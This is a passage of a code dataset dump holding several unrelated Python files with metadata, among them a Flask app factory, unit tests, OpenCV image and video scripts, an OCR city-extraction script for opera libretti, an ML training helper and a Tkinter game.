'logging.FileHandler',\n 'level': 'INFO',\n 'formatter': 'simple',\n 'filename': 'info.log',\n 'encoding': 'utf8',\n 'mode': 'w'\n }\n },\n 'loggers': {\n 'root': {\n 'level': 'INFO',\n 'handlers': ['console', 'info_file_handler'],\n 'propagate': False\n }\n }\n }\n logging.config.dictConfig(log_config_dict)\n return None\n", "sub_path": "common/log_config.py", "file_name": "log_config.py", "file_ext": "py", "file_size_in_byte": 1422, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "logging.config.config.dictConfig", "line_number": 54, "usage_type": "call"}, {"api_name": "logging.config.config", "line_number": 54, "usage_type": "attribute"}, {"api_name": "logging.config", "line_number": 54, "usage_type": "name"}]} +{"seq_id": "609850188", "text": "import hashlib\nimport unittest\n\nfrom sailthru.utils import flatten_dictionary, extract_values, make_signature_hash\n\n\nclass UtilsTests(unittest.TestCase):\n\n def setUp(self):\n self.secret = 'some totally super secret string'\n self.test_dict = {\n 'Linux Distros': {\n 'Ubuntu': {\n 'Quantal Quetzal': '12.10',\n 'Raring Ringtail': '13.04',\n 'Saucy Salamander': '13.10',\n 'Trusty Tahr': '14.04',\n 'Utopic Unicorn': '14.10',\n },\n 'Linux Mint': {\n 'Maya': '13',\n 'Nadia': '14',\n 'Olivia': '15',\n 'Petra': '16',\n 'Qiana': '17',\n },\n },\n 'OS X Versions': {\n 'Yosemite': '10.10',\n 'Mavericks': '10.9',\n 'Mountain Lion': '10.8',\n 'Lion': '10.7',\n 'Snow Leopard': '10.6',\n }\n }\n\n def test_flatten_dictionary(self):\n expected = {\n 'Linux DistrosUbuntuQuantal Quetzal': '12.10',\n 'Linux DistrosUbuntuRaring Ringtail': '13.04',\n 'Linux DistrosUbuntuSaucy Salamander': '13.10',\n 'Linux DistrosUbuntuTrusty Tahr': '14.04',\n 'Linux DistrosUbuntuUtopic Unicorn': '14.10',\n 'Linux DistrosLinux MintMaya': '13',\n 'Linux DistrosLinux MintNadia': '14',\n 'Linux DistrosLinux MintOlivia': '15',\n 'Linux DistrosLinux MintPetra': '16',\n 'Linux DistrosLinux MintQiana': '17',\n 'OS X VersionsYosemite': '10.10',\n 'OS X VersionsMavericks': '10.9',\n 'OS X VersionsMountain Lion': '10.8',\n 'OS X VersionsLion': '10.7',\n 'OS X VersionsSnow Leopard': '10.6',\n }\n output = flatten_dictionary(self.test_dict)\n self.assertEqual(expected, output)\n\n def test_extract_values(self):\n expected = sorted([\n '12.10', '13.04', '13.10', '14.04', '14.10', '13', '14', '15', '16', '17', '10.10', '10.9', '10.8',\n '10.7', '10.6'\n ])\n output = sorted(extract_values(self.test_dict))\n self.assertEqual(expected, output)\n\n def test_make_signature_hash(self):\n strings = sorted([\n str(value) for value in extract_values(self.test_dict)\n ])\n string = str(self.secret) + ''.join(strings)\n encoded = bytearray(string, encoding='utf8')\n expected = hashlib.md5(encoded).hexdigest()\n output = make_signature_hash(self.test_dict, self.secret)\n self.assertEqual(expected, output)\n\n\nif __name__ == '__main__':\n unittest.main()\n", "sub_path": "tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 2771, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "unittest.TestCase", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sailthru.utils.flatten_dictionary", "line_number": 55, "usage_type": "call"}, {"api_name": "sailthru.utils.extract_values", "line_number": 63, "usage_type": "call"}, {"api_name": "sailthru.utils.extract_values", "line_number": 68, "usage_type": "call"}, {"api_name": "hashlib.md5", "line_number": 72, "usage_type": "call"}, {"api_name": "sailthru.utils.make_signature_hash", "line_number": 73, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 78, "usage_type": "call"}]} +{"seq_id": "81179397", "text": "from flask import Flask\nfrom app.models import db, User, Product, Thumbnail, Picture, Post, PostPicture, Image\nfrom flask_bcrypt import Bcrypt\nfrom flask_login import LoginManager\n\nbcrypt = Bcrypt()\nlogin_manager = LoginManager()\n\ndef create_app(config_filename='config.py'):\n app = Flask(__name__)\n app.config.from_pyfile(config_filename)\n db.init_app(app)\n bcrypt.init_app(app)\n login_manager.init_app(app)\n with app.app_context():\n db.create_all()\n from app.on_init_utils import on_init_utils\n delete_unused_images, save_images, generate_static_pngs, delete_all_images = on_init_utils(app)\n with app.app_context():\n if app.config['SAVE_IMAGES']:\n delete_unused_images()\n save_images()\n generate_static_pngs()\n else:\n delete_all_images()\n with app.app_context():\n from app.routes import app_routes\n app.register_blueprint(app_routes)\n\n return app\n\n\n", "sub_path": "app/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 963, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "flask_bcrypt.Bcrypt", "line_number": 6, "usage_type": "call"}, {"api_name": "flask_login.LoginManager", "line_number": 7, "usage_type": "call"}, {"api_name": "app.models", "line_number": 10, "usage_type": "name"}, {"api_name": "flask.Flask", "line_number": 10, "usage_type": "call"}, {"api_name": "app.models.config.from_pyfile", "line_number": 11, "usage_type": "call"}, {"api_name": "app.models.config", "line_number": 11, "usage_type": "attribute"}, {"api_name": "app.models", "line_number": 11, "usage_type": "name"}, {"api_name": "app.models.db.init_app", "line_number": 12, "usage_type": "call"}, {"api_name": "app.models", "line_number": 12, "usage_type": "argument"}, {"api_name": "app.models.db", "line_number": 12, "usage_type": "name"}, {"api_name": "app.models", "line_number": 13, "usage_type": "argument"}, {"api_name": "app.models", "line_number": 14, "usage_type": "argument"}, {"api_name": "app.models.app_context", "line_number": 15, "usage_type": "call"}, {"api_name": "app.models", "line_number": 15, "usage_type": "name"}, {"api_name": "app.models.db.create_all", "line_number": 16, "usage_type": "call"}, {"api_name": "app.models.db", "line_number": 16, "usage_type": "name"}, {"api_name": "app.on_init_utils.on_init_utils", "line_number": 18, "usage_type": "call"}, {"api_name": "app.models", "line_number": 18, "usage_type": "argument"}, {"api_name": "app.models.app_context", "line_number": 19, "usage_type": "call"}, {"api_name": "app.models", "line_number": 19, "usage_type": "name"}, {"api_name": "app.models.config", "line_number": 20, "usage_type": "attribute"}, {"api_name": "app.models", "line_number": 20, "usage_type": "name"}, {"api_name": "app.models.app_context", "line_number": 26, "usage_type": "call"}, {"api_name": "app.models", "line_number": 26, "usage_type": "name"}, {"api_name": "app.models.register_blueprint", "line_number": 28, "usage_type": "call"}, {"api_name": "app.routes.app_routes", "line_number": 28, "usage_type": "argument"}, {"api_name": "app.models", "line_number": 28, "usage_type": "name"}, {"api_name": "app.models", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "354106822", "text": "import cv2\n\n#画像サイズ デフォルト\nimg_w = 749\nimg_h = 559\n\nprint(\"\"\"\n画像サイズは変更しますか\nYes = 1, No = 0\"\"\")\nCheck_resize = int(input())\n\n\n#動画作成の自作関数\ndef Make_Mov_from_imgs(img_w, img_h):\n fourcc = cv2.VideoWriter_fourcc('m','p','4','v')\n video = cv2.VideoWriter('_US_img_1-1000_{}_{}.mp4'.format(img_w, img_h), fourcc, 20.0, (img_w, img_h))\n\n \n for i in range(1, 1001):\n img = cv2.imread('_US_img_1-1000_749_559/pic_ ({}).png'.format(i))\n\n #変更する場合、リサイズ\n if Check_resize != 0:\n img = cv2.resize(img, (img_w, img_h))\n video.write(img)\n video.release() \n\n\n#サイズ変更しない\nif Check_resize == 0:\n Make_Mov_from_imgs(img_w, img_h)\nelse:#サイズ変更する\n print(\"画像の幅と高さを入力してください\")\n x = input(\"画像の幅  = \")\n y = input(\"画像の高さ = \")\n Make_Mov_from_imgs(int(x), int(y))\n \n", "sub_path": "_1_make_mov_from_imgs.py", "file_name": "_1_make_mov_from_imgs.py", "file_ext": "py", "file_size_in_byte": 969, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "cv2.VideoWriter_fourcc", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.VideoWriter", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "402276308", "text": "from texttable import Texttable\r\ndef pembayaran2():\r\n table= Texttable ()\r\n jawab1 = \"y\"\r\n no=0\r\n name=[]\r\n nim=[]\r\n kelas=[]\r\n membayar_semester=[]\r\n membayar_seminar=[]\r\n membayar_kas=[]\r\n membayar_uts=[]\r\n membayar_uas=[]\r\n admin=[]\r\n \r\n \r\n print (\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\")\r\n print ( \"JALUR PEMBAYARAN UAS & UTS \" )\r\n print (\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\") \r\n \r\n while(jawab1 == \"y\"):\r\n nama=(input(\"Masukan Nama : \"))\r\n nim=(input(\"Masukan NIM : \"))\r\n kelas=(input(\"Masukan Kelas: \"))\r\n pilih = (input(\"Apakah anda ingin membayar semester (y/t) ? \"))\r\n if pilih == 'y':\r\n membayar_semester =int(input(\"untuk berapa bulan ? \"))\r\n d_membayar_semester = 'membayar_SEMESTER'\r\n membayar_semester=550000*membayar_semester\r\n else :\r\n sem_ = ''\r\n sem=0 \r\n pilih = (input(\"ingin membayar UTS (y/t) ? \"))\r\n if pilih == 'y':\r\n membayar_uts =int(input(\"untuk berapa bulan ? \"))\r\n d_membayar_uts = 'membayar_UTS'\r\n membayar_uts=300000*membayar_uts\r\n else :\r\n membayar_uts_ = ''\r\n membayar_uts=0 \r\n pilih = (input(\"ingin membayar UAS (y/t) ? \"))\r\n if pilih == 'y':\r\n membayar_uas =int(input(\"untuk berapa bulan ? \"))\r\n d_membayar_uas = 'membayar_UAS'\r\n membayar_uas=200000*membayar_uas\r\n else :\r\n membayar_uas_ = ''\r\n membayar_uas=0 \r\n pilih = (input(\"ingin membayar seminar sebesar 150000 (y/t) ? \"))\r\n if pilih == 'y':\r\n membayar_seminar = 'membayar_seminar'\r\n membayar_seminar=150000\r\n else :\r\n membayar_seminar = ''\r\n membayar_seminar=0\r\n pilih = (input(\"ingin bayar KAS Bulanan sebesar 25000 (y/t) ? \"))\r\n if pilih == 'y':\r\n membayar_kas = 'membayar_KAS'\r\n membayar_kas=25000\r\n else :\r\n membayar_kas = ''\r\n membayar_kas=0\r\n pilih = (input(\"Anda akan dikenakan admin sebesar 10000 (y/t) ? \"))\r\n if pilih == 'y':\r\n admin = 'ADMIN'\r\n admin=10000\r\n else :\r\n admin = ''\r\n admin=0\r\n\r\n total_bayar = membayar_semester+membayar_seminar+membayar_kas+membayar_uts+membayar_uas+admin\r\n table.add_rows([['NAMA','NIM','KELAS','SEMESTER','SEMINAR','KAS','UTS','UAS','TOTAL'],\r\n [nama ,nim ,kelas ,membayar_semester , membayar_seminar , membayar_kas , membayar_uts , membayar_uas,total_bayar ]])\r\n print(\"\")\r\n print(\"\")\r\n print(\"\")\r\n print(\"Total Rincian Yang Dibayar\") \r\n print (table.draw())\r\n jawab1 = input(\"\\n Tambahkan Data Pembayaran (y/t)? \") ; print(\"\")\r\n", "sub_path": "Pembayaran.py", "file_name": "Pembayaran.py", "file_ext": "py", "file_size_in_byte": 2886, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "texttable.Texttable", "line_number": 3, "usage_type": "call"}]} +{"seq_id": "535645953", "text": "import shutil\nimport requests\nimport pandas as pd\nfrom PIL import Image\nimport io\nimport pytesseract\nimport os\nimport json\nimport geopy\nimport geonamescache\nimport unicodedata as ud\nimport string as strMod\nfrom difflib import SequenceMatcher\n\ndef similar(a, b):\n return SequenceMatcher(None, a, b).ratio()\n\ndef isAllNum(string):\n numb=''\n for el in string:\n if el.isdigit():\n numb+=el\n if len(numb)>0:\n return int(numb)\n else: return string\n\n\n\ndef makeNumeric(element):\n if type(element) == int:\n return element\n if type(element) == list:\n return isAllNum(element[0])\n if type(element) == str:\n return isAllNum(element)\n\n\nlatin_letters= {}\ndef is_latin(uchr):\n try: return latin_letters[uchr]\n except KeyError:\n return latin_letters.setdefault(uchr, 'LATIN' in ud.name(uchr))\n\ndef only_roman_chars(unistr):\n return all(is_latin(uchr)\n for uchr in unistr\n if uchr.isalpha())\ndef notAllUpper(string):\n for el in string:\n if el.isupper():\n pass\n else: return True\n\ndef dealWithPunctuation(text):\n punc = strMod.punctuation\n punc +='’'\n\n string = [el if el not in punc else ' '+el+' ' for el in text]\n return ''.join(string)\n\n# Functions to extract entities from the text\ndef findYearTitle(jsonData):\n metaData = jsonData['metadata']\n title = 'no_title'\n year = 'no_year'\n for el in metaData:\n if el['label'] == 'title':\n title = el['value']\n if el['label'] == 'date_year_start':\n year = el['value']\n\n return title, year\n\ndef getSplitText(urlPage):\n # get text with teseract\n response = requests.get(urlPage, stream=True)\n in_memory_file = io.BytesIO(response.content)\n text = pytesseract.image_to_string(Image.open(in_memory_file))\n text = dealWithPunctuation(text)\n textSplit = text.split()\n # textSplit = [word for word in textSplit if len(word)>2]\n return textSplit\n\ndef getPotCityName(textSplit):\n pot_city_name = []\n for word in textSplit:\n for city in italianCitiesList:\n #if similar(city.lower(), word.lower())>0.9:\n if city.lower() == word.lower():\n pot_city_name.append(city.lower())\n return pot_city_name\n\n# To compile a list of all cities\ndef cityDic():\n city = geonamescache.GeonamesCache().get_cities()\n citiyDic = {}\n cityList = []\n n=0\n for key in city:\n if city[key]['countrycode'] == 'IT' and city[key]['population']> 20000:\n if len(city[key]['alternatenames'][0]) != 0:\n validCityNames = [city[key]['name'].lower()] + [name.lower() for name in city[key]['alternatenames'] if only_roman_chars(name) and notAllUpper(name) and len(name)>3]\n cityList += validCityNames\n for name in validCityNames:\n citiyDic[name] = city[key]\n\n else:\n cityList+=[city[key]['name'].lower()]\n citiyDic[city[key]['name'].lower()] = city[key]\n\n n+=1\n\n cityFilter = ['regio', 'marino', 'come', 'bra', 'ramma']\n cityList = list(filter(lambda a: a not in cityFilter, cityList))\n cityList = list(set(cityList))\n print(len(cityList))\n return citiyDic, cityList\n\n\n\n#change path according to need\ninPath = '/home/nulpe/Desktop/foundations_dh/fdh_manifests/'\noutPath = '/home/nulpe/Desktop/foundations_dh/data/'\ncolumns =['file_name', 'title', 'date', 'coperta', 'pot_city_name', 'city_name', 'latitude', 'longitude']\ndf_librettos = pd.DataFrame(columns= columns)\n\n\nitalianCities, italianCitiesList = cityDic()\n\n\n\n\n\npotCityMatches = 0\n\nfor idx, filename in enumerate(os.listdir(inPath)):\n tempList = []\n\n if filename.endswith(\".json\"):\n tempList.append(filename)\n with open(inPath+filename) as jsonFile:\n jsonData = json.load(jsonFile)\n title, year = findYearTitle(jsonData)\n tempList.append(title)\n tempList.append(makeNumeric(year))\n front_page = []\n pot_city_name = []\n\n pagesData = jsonData['sequences'][0]['canvases']\n page = 0\n\n\n #Only look at the coperte\n i=0\n coperta = True\n\n\n #get text from coperte\n while coperta:\n try:\n el = pagesData[i]\n i += 1\n\n imageApi = el['images'][0]['resource']['service']['@id']\n urlPage = imageApi+'/full/,512/0/default.jpg'\n\n #get text with teseract & potential city name\n textSplit = getSplitText(urlPage)\n front_page += textSplit\n pot_city_name = getPotCityName(textSplit)\n coperta_appended = 0\n\n if 'coperta' not in pagesData[i]['label']:\n coperta = False\n except:\n print('page missing')\n break\n\n\n\n if len(front_page) <30:\n while len(front_page) < 100:\n try:\n el = pagesData[i]\n i += 1\n imageApi = el['images'][0]['resource']['service']['@id']\n urlPage = imageApi + '/full/,512/0/default.jpg'\n\n # get text with teseract\n textSplit = getSplitText(urlPage)\n front_page += textSplit\n pot_city_name += getPotCityName(textSplit)\n coperta_appended = 1\n except:\n print('page missing')\n break\n\n\n\n\n\n\n tempList.append(front_page)\n tempList.append(pot_city_name)\n \n\n #Get location of first mentioned city\n if len(pot_city_name) != 0:\n tempList.append(italianCities[pot_city_name[0]]['name'])\n tempList.append(italianCities[pot_city_name[0]]['latitude'])\n tempList.append(italianCities[pot_city_name[0]]['longitude'])\n else:\n tempList.append(0)\n tempList.append(0)\n tempList.append(0)\n\n if len(pot_city_name) != 0:\n potCityMatches+=1\n\n\n df_librettos.loc[len(df_librettos)] =tempList\n\n print('we are at ', idx + 1, 'of in total', len(os.listdir(inPath)), 'librettos. We have', potCityMatches/(idx + 1)*100, '% city matches')\n\n if (idx+1) % 10 == 0:\n print(df_librettos)\n df_librettos.columns = columnas\n df_librettos.to_pickle(outPath+'librettos_1.pkl')\n df_librettos.to_csv(outPath+'librettos_1.csv', index=False, sep='\\t', header=True)\n\n\n\n\n\n\n\n\n\n\n", "sub_path": "02_place_extraction.py", "file_name": "02_place_extraction.py", "file_ext": "py", "file_size_in_byte": 6841, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "difflib.SequenceMatcher", "line_number": 16, "usage_type": "call"}, {"api_name": "unicodedata.name", "line_number": 42, "usage_type": "call"}, {"api_name": "string.punctuation", "line_number": 55, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 76, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 77, "usage_type": "call"}, {"api_name": "pytesseract.image_to_string", "line_number": 78, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 78, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 78, "usage_type": "name"}, {"api_name": "geonamescache.GeonamesCache", "line_number": 95, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 125, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 136, "usage_type": "call"}, {"api_name": "json.load", "line_number": 142, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 223, "usage_type": "call"}]} +{"seq_id": "215432780", "text": "import time\nfrom sklearn.cross_validation import train_test_split\n\nfrom ..utils import print_status_message, fit_transforms, apply_transforms, predict_score\n\n\ndef train_model(X, y, model, library, metric, transforms, eval=False, plot_eval_history=False,\n early_stopping=False, early_stopping_rounds=None, verbose=False, logger=None):\n \"\"\"\n Trains a new model using the provided training data.\n\n Parameters\n ----------\n X : array-like\n Training input samples.\n\n y : array-like\n Target values.\n\n model : object\n An object in memory that represents a model definition.\n\n library : {'sklearn', 'xgboost', 'keras'}\n The source library of the model. Supports more than just scikit-learn models, however\n since model APIs can vary there may be different features/capabilities available depending\n on which library is used.\n\n metric : {'accuracy', 'f1', 'log_loss', 'mean_absolute_error', 'mean_squared_error', 'r2', 'roc_auc'}\n Scoring metric.\n\n transforms : array-like\n List of objects with a transform function that accepts one parameter.\n\n eval : boolean, optional, default False\n Evaluate model on a hold-out set during training.\n\n plot_eval_history : boolean, optional, default False\n Plot model performance as a function of training time. Eval must be enabled.\n\n early_stopping : boolean, optional, default False\n Stop training the model when performance on a validation set begins to drop. Eval must be enabled.\n\n early_stopping_rounds : int, optional, default None\n Number of training iterations to allow before stopping training due to performance on a validation set.\n Eval and early_stopping must be enabled.\n\n verbose : boolean, optional, default False\n Prints status messages to the console if enabled.\n\n logger : object, optional, default None\n Instance of a class that can log messages to an output file.\n\n Returns\n ----------\n model : object\n An object in memory that represents a fitted model.\n\n training_history : array-like\n Model performance on a validation set after each training epoch. Only available for certain models.\n \"\"\"\n print_status_message('Beginning model training...', verbose, logger)\n t0 = time.time()\n X_train = None\n X_eval = None\n y_train = None\n y_eval = None\n training_history = None\n\n if eval:\n X_train, X_eval, y_train, y_eval = train_test_split(X, y, test_size=0.1)\n transforms = fit_transforms(X_train, y_train, transforms)\n X_train = apply_transforms(X_train, transforms)\n X_eval = apply_transforms(X_eval, transforms)\n\n if early_stopping:\n if library == 'xgboost':\n model.fit(X_train, y_train, eval_set=[(X_eval, y_eval)], eval_metric='rmse',\n early_stopping_rounds=early_stopping_rounds)\n training_history = model.eval_results\n print_status_message('Best iteration found = {0}'.format(str(model.best_iteration)), verbose, logger)\n else:\n raise Exception('Early stopping not supported.')\n else:\n if library == 'xgboost':\n model.fit(X_train, y_train, eval_set=[(X_eval, y_eval)], eval_metric='rmse')\n training_history = model.eval_results\n print('TODO')\n elif library == 'keras':\n model.validation_data = (X_eval, y_eval)\n training_history = model.fit(X_train, y_train)\n min_eval_loss = min(training_history.history['val_loss'])\n min_eval_epoch = min(enumerate(training_history.history['loss']), key=lambda x: x[1])[0] + 1\n print_status_message('Min eval loss = {0}'.format(str(min_eval_loss)), verbose, logger)\n print_status_message('Min eval epoch = {0}'.format(str(min_eval_epoch)), verbose, logger)\n else:\n raise Exception('Model evaluation not supported.')\n else:\n transforms = fit_transforms(X, y, transforms)\n X = apply_transforms(X, transforms)\n if library == 'keras':\n training_history = model.fit(X, y)\n else:\n model.fit(X, y)\n\n t1 = time.time()\n print_status_message('Model trained in {0:3f} s.'.format(t1 - t0), verbose, logger)\n\n print_status_message('Model hyper-parameters:', verbose, logger)\n print_status_message(str(model.get_params()), verbose, logger)\n\n if eval:\n print_status_message('Calculating training score...', verbose, logger)\n train_score = predict_score(X_train, y_train, model, metric)\n print_status_message('Training score = {0}'.format(str(train_score)), verbose, logger)\n\n print_status_message('Calculating evaluation score...', verbose, logger)\n eval_score = predict_score(X_eval, y_eval, model, metric)\n print_status_message('Evaluation score = {0}'.format(str(eval_score)), verbose, logger)\n\n if plot_eval_history:\n if library == 'xgboost':\n print('TODO')\n elif library == 'keras':\n print('TODO')\n else:\n raise Exception('Eval history not supported.')\n else:\n print_status_message('Calculating training score...', verbose, logger)\n train_score = predict_score(X, y, model, metric)\n print_status_message('Training score = {0}'.format(str(train_score)), verbose, logger)\n\n return model, training_history\n", "sub_path": "ionyx/experiment/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 5555, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "utils.print_status_message", "line_number": 61, "usage_type": "call"}, {"api_name": "time.time", "line_number": 62, "usage_type": "call"}, {"api_name": "sklearn.cross_validation.train_test_split", "line_number": 70, "usage_type": "call"}, {"api_name": "utils.fit_transforms", "line_number": 71, "usage_type": "call"}, {"api_name": "utils.apply_transforms", "line_number": 72, "usage_type": "call"}, {"api_name": "utils.apply_transforms", "line_number": 73, "usage_type": "call"}, {"api_name": "utils.print_status_message", "line_number": 80, "usage_type": "call"}, {"api_name": "utils.print_status_message", "line_number": 93, "usage_type": "call"}, {"api_name": "utils.print_status_message", "line_number": 94, "usage_type": "call"}, {"api_name": "utils.fit_transforms", "line_number": 98, "usage_type": "call"}, {"api_name": "utils.apply_transforms", "line_number": 99, "usage_type": "call"}, {"api_name": "time.time", "line_number": 105, "usage_type": "call"}, {"api_name": "utils.print_status_message", "line_number": 106, "usage_type": "call"}, {"api_name": "utils.print_status_message", "line_number": 108, "usage_type": "call"}, {"api_name": "utils.print_status_message", "line_number": 109, "usage_type": "call"}, {"api_name": "utils.print_status_message", "line_number": 112, "usage_type": "call"}, {"api_name": "utils.predict_score", "line_number": 113, "usage_type": "call"}, {"api_name": "utils.print_status_message", "line_number": 114, "usage_type": "call"}, {"api_name": "utils.print_status_message", "line_number": 116, "usage_type": "call"}, {"api_name": "utils.predict_score", "line_number": 117, "usage_type": "call"}, {"api_name": "utils.print_status_message", "line_number": 118, "usage_type": "call"}, {"api_name": "utils.print_status_message", "line_number": 128, "usage_type": "call"}, {"api_name": "utils.predict_score", "line_number": 129, "usage_type": "call"}, {"api_name": "utils.print_status_message", "line_number": 130, "usage_type": "call"}]} +{"seq_id": "121537457", "text": "\"\"\"\nPatrick Stadler (pstadler1990)\nUniversität Regensburg\nSS 19\n\"\"\"\nimport io\nimport os\nimport csv\nimport json\n\nYEAR = \"2018\"\nOUT_DIR = os.path.join(\"converted_data\", YEAR)\nKEYWORD_EN_FILE = os.path.join(OUT_DIR, \"DHD_Keywords.csv\")\nOUT_FILE = os.path.join(OUT_DIR, \"keywords_en_split.json\")\n\n\ndef apply_keyword(keyword):\n return clear_keyword(keyword) # split_keyword removed due to wikipedia search being more polite to larger keywords\n\n\ndef split_keyword(keyword):\n \"\"\"\n Splits the keyword into multiple keyboards (if separated by a whitespace)\n Creates a set of:\n - every single keyword in a list of keywords (i.e. 3d digital art) => 3d, digital, art\n - every pair of two keywords from the left => 3d digital\n - every pair of two keywords from the right => digital art\n This increases the chances of matching with the category list (tags)\n \"\"\"\n entries = []\n entries_all = keyword[1].split(' ')\n entries_split_length = len(entries_all)\n if entries_split_length <= 1:\n entries = entries_all\n else:\n for i in range(entries_split_length):\n entries += keyword[1].split(' ', maxsplit=1)\n for i in range(entries_split_length):\n entries += keyword[1].rsplit(' ', maxsplit=1)\n entries = list(set(entries) | set(entries_all))\n return {'original': keyword[0], 'en': keyword[1], 'entries': entries}\n\n\ndef clear_keyword(keyword):\n return [k.strip().lower() for k in keyword]\n\n\ndef parse_keywords(keyword_file, out_file):\n \"\"\"\n Splits each keyword into an object (each word - separated by a whitespace - becomes an entry\n in the object's entry list\n \"\"\"\n with io.open(keyword_file, newline='') as file:\n keywords = csv.reader(file, delimiter=',')\n keyword_list = ([apply_keyword(keyword) for keyword in keywords])\n with io.open(out_file, \"w\", encoding=\"utf8\") as out_file:\n json.dump(keyword_list, out_file, ensure_ascii=False)\n\n\nif __name__ == \"__main__\":\n parse_keywords(KEYWORD_EN_FILE, out_file=OUT_FILE)\n", "sub_path": "KeywordCleaner.py", "file_name": "KeywordCleaner.py", "file_ext": "py", "file_size_in_byte": 2075, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "io.open", "line_number": 53, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 54, "usage_type": "call"}, {"api_name": "io.open", "line_number": 56, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 57, "usage_type": "call"}]} +{"seq_id": "382144810", "text": "import numpy as np\nimport cv2\n\nimg = cv2.imread('../../Picture/water.jpg', 1)\nimgInfo = img.shape\nprint(\"img.shape:\", imgInfo) # 输出图片的[宽度, 高度, 图片的颜色组成方式]\ncv2.imshow(\"img\", img)\nheight = imgInfo[0]\nwidth = imgInfo[1]\nmode = imgInfo[2]\n\n# 图像旋转getRotationMatrix2D()\n# 第一个参数表示图片的中心点\n# 第二个参数表示的度数\n# 第三个参数表示缩放比例, 最大为1\nfor i in range(0, 360, 1):\n matRotate = cv2.getRotationMatrix2D((width / 2.0, height / 2.0), i, i / 360)\n dst = cv2.warpAffine(img, matRotate, (width, height))\n cv2.imshow(\"dst\", dst)\n cv2.waitKey(10)\n", "sub_path": "muke_OpenCV/01几何变换/14_图片旋转.py", "file_name": "14_图片旋转.py", "file_ext": "py", "file_size_in_byte": 644, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "cv2.imread", "line_number": 4, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.getRotationMatrix2D", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.warpAffine", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "437293832", "text": "\ntry:\n # for Python2\n from Tkinter import * ## notice capitalized T in Tkinter\nexcept ImportError:\n # for Python3\n from tkinter import * ## notice lowercase 't' in tkinter here\n\nroot = Tk()\n\n\"\"\"\n.Main File that determines paths\n\"\"\"\n\nimport PIL\nfrom PIL import Image, ImageDraw, ImageTk\n\n\n# Imported module functions\nfrom start import *\n\n\n\nclass GuessingGame:\n def __init__(self, master):\n self.master = master\n # Title of page\n master.title(\"The Golden Carrot\")\n\n # Main Text\n self.message = \"The Golden Carrot\"\n self.label_text = StringVar()\n self.label_text.set(self.message)\n self.label = Label(master, textvariable=self.label_text)\n self.label.grid(row=0, column=0, columnspan=2, sticky=W + E)\n self.label.config(background=\"#d8dad9\", height=20, width=60)\n\n # Bunny Name\n self.b_name = \"Bunny\"\n self.label_bun = StringVar()\n self.label_bun.set(self.b_name)\n self.bun = Label(master, textvariable=self.label_bun)\n\n\n # Main 2 Buttons\n self.yes_button = Button(master, text=\"Continue\", command=self.introductions)\n self.no_button = Button(master, text=\"Back\", state=DISABLED)\n self.name = Entry(master)\n self.name.config(highlightbackground=\"#d8dad9\", highlightcolor=\"#d8dad9\")\n self.no_button.grid(row=2, column=0, sticky=W + E)\n self.no_button.config(highlightbackground=\"#d8dad9\", highlightcolor=\"#d8dad9\")\n self.yes_button.grid(row=2, column=1, sticky=W + E)\n self.yes_button.config(highlightbackground=\"#d8dad9\", highlightcolor=\"#d8dad9\")\n\n # Items\n self.items = ['lettuce', 'a pebble']\n\n # Drawing\n self.top = Toplevel()\n self.c = Canvas(self.top, bg='white', width=600, height=600)\n self.top.wm_title(\"Draw \" + self.label_bun.get())\n self.c.grid(row=1, columnspan=5)\n self.image1 = PIL.Image.new('RGB', (600, 600), '#d8dad9')\n self.save_button = Button(self.top, text='save', command=self.use_save)\n self.save_button.grid(row=0, column=1)\n self.drawing_setup()\n self.top.withdraw()\n\n # Save Drawing\n def use_save(self, *args):\n self.filename = 